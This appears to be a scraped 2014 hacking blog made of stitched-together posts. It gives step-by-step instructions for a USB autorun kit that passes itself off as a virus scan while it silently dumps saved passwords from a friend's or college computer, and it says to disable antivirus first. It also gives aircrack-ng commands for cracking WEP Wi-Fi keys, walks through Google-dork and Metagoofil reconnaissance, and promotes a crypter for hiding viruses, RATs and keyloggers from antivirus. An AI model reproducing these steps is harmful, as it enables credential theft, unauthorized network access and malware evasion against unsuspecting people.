Today I will show you how to hack Passwords using an USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer. We need the following tools to create our rootkit: MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM. Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free. Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts. IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0 Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more… PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename
Here is a step by step procedre to create the password hacking toolkit: NOTE: You must temporarily disable your antivirus before following these steps. 1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive. ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive. 2. Create a new Notepad and write the following text into it: [autorun] open=launch.bat ACTION= Perform a Virus Scan save the Notepad and rename it from New Text Document.txt to autorun.inf Now copy theautorun.inf file onto your USB pendrive. 3. Create another Notepad and write the following text onto it: start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt save the Notepad and rename it from New Text Document.txt to launch.bat Copy the launch.bat file also to your USB Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps 1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive). 2. In the pop-up window, select the first option (Perform a Virus Scan). 3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files. 4. Remove the pendrive and you’ll see the stored passwords in the .TXT files. This hack works on Windows 2000, XP,Vista and 7 NOTE: This procedure will only recover the stored passwords (if any) on the Computer
Wednesday, 22 January 2014
How to hack password using usb
Folder lick with out any software
Folder Lock Without Any Software :Folder Lock With Password Without Any SoftwarePaste the code given below in notepad and 'Save' it as batch file (with extension '.bat'). Any name will do. Then you see a batch file. Double click on this batch file to create a folder locker. New folder named 'Locker' would be formed at the same location. Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'. If you want to unlock your files,double click the batch file again and you would be prompted for password. Enter the password and enjoy access to the folder. if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK if NOT EXIST Locker goto MDLOCKER :CONFIRM echo Are you sure u want to Lock the folder(Y/N) set/p "cho=>" if %cho%==Y goto LOCK if %cho%==y goto LOCK if %cho%==n goto END if %cho%==N goto END echo Invalid choice. goto CONFIRM :LOCK ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" attrib +h +s "Control Panel.{21EC2020-3AEA-1069A2DD-08002B30309D}" echo Folder locked goto End :UNLOCK echo Enter password to Unlock folder set/p "pass=>" if NOT %pass%==type your password here goto FAIL attrib -h -s "Control Panel.{21EC2020-3AEA-1069A2DD-08002B30309D}" ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker echo Folder Unlocked successfully goto End :FAIL echo Invalid password goto end :MDLOCKER md Locker echo Locker created successfully goto End :End
Tuesday, 21 January 2014
How to access blocked websites in Pak humanity / 34 days ago
India became acquainted, though maybe not willingly, with Ashok Kumar or India’s John Doe a few months before. The unimaginative name, suitably so, has taken on painful significance for Internet users. It’s on the back of an Ashok Kumar court order that Internet service providers (ISPs) have blocked torrent sites.
But also affected were legitimate video sharing sites such as Dailymotion and Vimeo. These are frequently used by creative professionals to share their commercial content.
Now, while we do not condone the use of torrent and video-sharing sites to share copyrighted content, there’s a fair case to be made that it isn’t the medium that should be punished. It is the very same medium that lets you download tonnes of copyright-free content fast and easy. So, for those who have been inconvenienced by over-zealous ISPs, here are a few tips to access such blocked content.
For example we wanna get access to zedge.net or adf.ly shortened urls,
Step 1 : Open the URL http://unblocksit.es
Step 2 : Provide the input of the URL you want to access and hit Go.
And it was as simple as that, get access to any of the websites which are blocked any where, this tip will work all over the world and not only in india.
you can use this to access facebook, twitter or any other sites which are blocked by your ISPs or the local network administrator.
Hope you enjoyed the trick.
How to hack wifi wep with Backtrack 5 . Pak humanity / nahdiaameen / 84 days ago
Download Backtrack. Its a Linux operting system. You can download it by searching on Google simply then it is make bootable by usb by simply viewing the ubentu video on YouTube. Then it is able to use
TERMINAL COMMANDS:
startx
GO TO TASKBAR AND CLICK ON THE COMMAND CONSOLE ICON:
/etc/init.d/networking start
airmon-ng
CHECK THE NAME OF THE WIRELESS CARD:
airmon-ng stop [wireless card name] airmon-ng start [wireless card name] airmon-ng (to see the changes)
airodump-ng [wireless card name] ctrl c
airodump-ng -w wep -c [channel number] –bssid [Bssid number] [wireless card name]
OPEN UP NEW CONSOLE:
aireplay-ng -1 0 -a [bssid] [wireless card name]
OPEN UP NEW CONSOLE:
aireplay-ng -3 -b [bssid][wireless card name]
BRING UP 1ST CONSOLE:(run until data +30,000)
BRING UP CONSOLE SENDING/RECEIVING DATA:
ctrl c
dir
LOOK FOR FILE ENDING IN .cap
aircrack-ng [filename]
THIS WILL GIVE THE WIRELESS KEY!
India’s own Spying PRISM “Netra” coming soon
Think twice before using some words like ‘Bomb’, ‘Attack’, ‘Blast’ or ‘kill’ in your Facebook status update, tweets or emails, because this may flag you as a potential terrorist under a surveillance project of Indian Security agencies. This Indian Internet surveillance project named as NETRA (Network Traffic Analysis), capable of detecting and capture any dubious voice traffic passing through software such as Skype or Google Talk, according to the Economic Times. In Hindi, NETRA means “eye” and this project is an Indian version of PRISM i.e. A spying project by US National Security Agency (NSA), that also allows the government to monitor the Internet and telephone records of citizens.
Reportedly, NETRA is under testing right now by the Indian Intelligence Bureau and Cabinet Secretariat and after on success will be deployed by all Indian National security agencies. Centre for Artificial Intelligence and Robotics (CAIR), a lab under Defence Research and Development Organisation (DRDO) is still hardworking on ‘Netra’ project to give it extraordinary features like NSA’s PRISM. One of the fun fact about the project is that, NETRA is defined to use only 300 GB of storage space for storing the intercepted internet traffic… Are they serious..? HOW is it POSSIBLE? and this data will be shared with only maximum three security agencies, including the Intelligence Bureau (IB) and Cabinet Secretariat. At this time, even I am not sure that what does they mean by “300 GB of storage space”, but we are trying to contact DRDO guys for more further information on this matter.
Anyway, NSA has a 100,000 square foot “mission critical data center”, where they are intercepting 1.7 billion American electronic records and communications a day, using 5 Zettabytes (1 Trillion GB) space to keep every information stored for next 500s years at least.
Also some questions arise here that:
Do they have the capability to handle and analyze such huge amount of data? (If it is not 300GB only)
Other than terrorist attacks, will they also deal with Computer Security Incidents and vulnerabilities?
What does that 300 GB of storage space mean?
The government should clear the objectives and ability of the NETRA project. Because according to the population of Internet users in India, words like ‘Bomb’, ‘Attack’, ‘Blast’ or ‘kill’ will trigger RED ALARM millions of times a day and if they don’t have the capability to trace down right mischief people, rather than disturbing elements, which may purposefully divert the attention of security agencies for various means.
Another major concern is Privacy, unwarranted digital intrusions and interference with citizens’ online communications.
Forbes India reported that, India has more than around 50 different laws, rules and regulations that aim to uphold privacy and confidentiality in various domains. Unfortunately, most of those policies are very dated and do not sufficiently take into account the challenges of contemporary information societies.
Do they believe that secrecy, confidentiality and, most importantly, privacy, must be sacrificed for national security? Bruce Schneier, security technologist said before,“There is no security without privacy. And liberty requires both security and privacy.”
Social hacking
Search Engine Hacking
Search engines, by definition, are used to find and locate information on the World Wide Web. In addition to using search engines to search for information, attackers have ways of using search engines to identify and locate vulnerabilities and confidential data.
Using search engines to find vulnerabilities offers a way for attackers to probe a network without the target’s knowledge since the entire search request and response come from the search engine and not the target. The attacker doesn’t leave a footprint since he is not sending information to the target. Attackers also use a cached page to view the information, instead of accessing the site directly, which creates another layer of protection for them.
Google Hacking
Numerous books and presentations discuss how to gather “sensitive” information from Google. Attackers can use Google to gather basic information such as contact lists, internal documents, and top-level organizational structures, as well as locate potential vulnerabilities in an organization’s web application.
Attackers can use a specific type of search query, called a dork, to locate security issues or confidential data. Attackers can use dorks to obtain firewall logs and customer data, and to find ways to access an organization’s database.
Security professionals have developed public databases of dorks. Dork databases exist for several different search engines; the most common dork database is the Google Hacking Database.
Note
The Google Hacking Database (GHDB) is a great resource for finding dorks that can aid an attacker. The GHDB is located at http://johnny.ihackstuff.com/ghdb/.
Using a dork is relatively simple. An attacker locates a dork of interest, and then uses Google to search for the dork. The following code is a dork that attempts to identify web applications that are susceptible to an SQL injection vulnerability by searching for a MySQL error message that commonly signifies the existence of an SQL injection flaw:
"Unable to jump to row" "on MySQL result index" "on line"
An attacker can limit the dork to a certain domain by adding the site: directive to the query string. For example, here is a Google query that is limited to the example.com domain:
"Unable to jump to row" "on MySQL result index" "on line" site:example.com
Figure 1-4 illustrates the execution of the SQL injection dork. Notice that more than 900,000 results were returned!
Figure 1-4. Execution of an SQL injection dork
Automating Google Hacking
An attacker can use the Search Engine Assessment Tool (SEAT), developed by Midnight Research Labs, to automate Google hacking. SEAT uses search engines and search caches to search for vulnerabilities for a particular domain.
SEAT supports multiple search engines, including Google, Yahoo!, and MSN. SEAT also has a variety of built-in dorks. The databases that SEAT uses (shown in Figure 1-5) were compiled from multiple sources, including the GHDB and Nikto.
An attacker can select multiple databases and search engines when using SEAT. Along with SEAT’s multithreading, these features aid the attacker greatly when he’s gathering information via search engine hacking. Figure 1-6 shows SEAT during the execution stage running 15 simultaneous queries.
Note
You can obtain the latest version of SEAT from http://midnightresearch.com/projects/search-engine-assessment-tool/.
Extracting Metadata from Online Documents
Metadata is “data about other data.” A good example of metadata is the data that is often inserted into Microsoft Office documents such as Word. For instance, Microsoft Word inserts data such as usernames and folder paths of the author’s machine. Attackers can extract this metadata from documents that corporations have put online.
Using search engines, attackers can use specific directives to limit their results to specific file types that are known to include metadata. For example, the Google directive filetype:doc will return only Microsoft Word files. The following is a query that returns only PowerPoint presentations that contain the phrase “Q4 Expenses”:
filetype:ppt "Q4 Expenses"
Figure 1-5. SEAT’s different built-in vulnerability databases
Attackers query Google using such queries; then they download the documents that are returned and examine them, pulling out any metadata stored within them.
Metagoofil is an automated tool that queries Google to find documents that are known to contain metadata. Metagoofil will query Google using a specific domain, download the files that are returned, and then attempt to extract the contents. Here is a demonstration of Metagoofil being used against example.com:
$ python metagoofil.py -d example.com -f all -l 3 -o example.html -t DL
*************************************
*MetaGooFil Ver. 1.4a *
*Coded by Christian Martorella *
*Edge-Security Research *
*cmartorella@edge-security.com *
*************************************
[+] Command extract found, proceeding with leeching
[+] Searching in example.com for: pdf
[+] Total results in google: 5300
[+] Limit: 3
[ 1/3 ] http://www.example.com/english/lic/gl_app1.pdf
[ 2/3 ] http://www.example.com/english/lic/gl_app2.pdf
[ 3/3 ] http://www.example.com/english/lic/gl_app3.pdf
[+] Searching in example.com for: doc
[+] Total results in google: 1500
[+] Limit: 3
[ 1/3 ] http://www.example.com/english/lic/gl_app1.doc
[ 2/3 ] http://www.example.com/english/lic/gl_app2.doc
[ 3/3 ] http://www.example.com/english/lic/gl_app3.doc
[+] Searching in example.com for: xls
[+] Total results in google: 20
[+] Limit: 3
[ 1/3 ] http://www.example.com/english/lic/gl_app1.xls
[ 2/3 ] http://www.example.com/english/lic/gl_app2.xls
[ 3/3 ] http://www.example.com/english/lic/gl_app3.xls
[+] Searching in example.com for: ppt
[+] Total results in google: 60
[+] Limit: 3
[ 1/3 ] http://www.example.com/english/lic/gl_app1.ppt
[ 2/3 ] http://www.example.com/english/lic/gl_app1.ppt
[ 3/3 ] http://www.example.com/english/lic/gl_app1.ppt
[+] Searching in example.com for: sdw
[+] Total results in google: 0
[+] Searching in example.com for: mdb
[+] Total results in google: 0
[+] Searching in example.com for: sdc
[+] Total results in google: 0
[+] Searching in example.com for: odp
[+] Total results in google: 0
[+] Searching in example.com for: ods
[+] Total results in google: 0
Usernames found:
================
rmiyazaki
tyamanda
hlee
akarnik
April Jacobs
Rwood
Amatsuda
Dmaha
Dock, Matt
Paths found:
============
C:\WINNT\Profiles\Dmaha\
C:\TEMP\Dmaha\
C:\Program Files\Microsoft Office\Templates|Presentation Designs\example
C:\WINNT\Profiles\Rwood
[+] Process finished
Figure 1-6. SEAT using 15 threads, searching for vulnerabilities using multiple search engines
Note
The publicly available Python script metagoofil.py aids in searching, gathering, and extracting metadata from documents. It is available from http://www.edge-security.com/metagoofil.php.
Searching for Source Code
Developers will often post code on public forums when they discover a bug they cannot solve. Too often, these developers will post code without redacting it in any way. It is unsettling how often these forums display code that clearly belongs to a specific organization.
Information such as the developer’s name, internal comments, code descriptions, and organizational ownership are among the items you can find in source code that is posted on public forums on the Internet.
Using Google, it is trivial to find some of this code in a short period of time. Using search terms such as “here is the code” and “here is the exact code” will return many results. Here is a code snippet that we found using Google (the code has been redacted):
<?php
$error = ""; // Set a variable that will be used for errors
$sendTo = ""; // Set a variable that will be used for emailing
// Form is submitted
if(isset($_POST['upload']) && $_POST['upload'] == 'Upload File')
{
$whereto = $_POST['where']; // Gets post value from select menu
// Gets file value from file upload input
$whatfile = $_FILES['uploadedfile']['name'];
// This is the subject that will appear in the email
$subject = "File uploaded to ". $whereto ." directory";
$from = "FTP UPLOAD <noreply@redacted.com>";
// Checks to see if $whereto is empty, if so echo error
if(empty($whereto))
{
$error = "You need to choose a directory.<br />";
}
// Checks to see if file input field is empty, if so throw an error
if($whatfile == NULL) {
$error .= "You need to choose a file.";
}
//if no errors so far then continue uploading
if(!empty($whereto) && $whatfile != NULL) {
$target_path = "$whereto/"; // The directory the file will be placed
...
This code snippet describes upload functionality that is on a web server. An attacker can use this code to reverse-engineer how to get a file into a different directory, or how to bypass the security mechanisms that are in place.
Monday, 20 January 2014
Aegis Crypter 2.4 Full Version
Aegis Crypter 2.4 Full Version
Aegis Crypter can be used to encrypt viruses,RAT,keyloggers,spywares etc to make them undetectable from antiviruses.When these exe files are encrypted with Fud crypters they become undetectable with antiviruses.
To Know the further information and installation of Aegis Crypter 2.4 visit to: http://www.aegiscrypter.com/
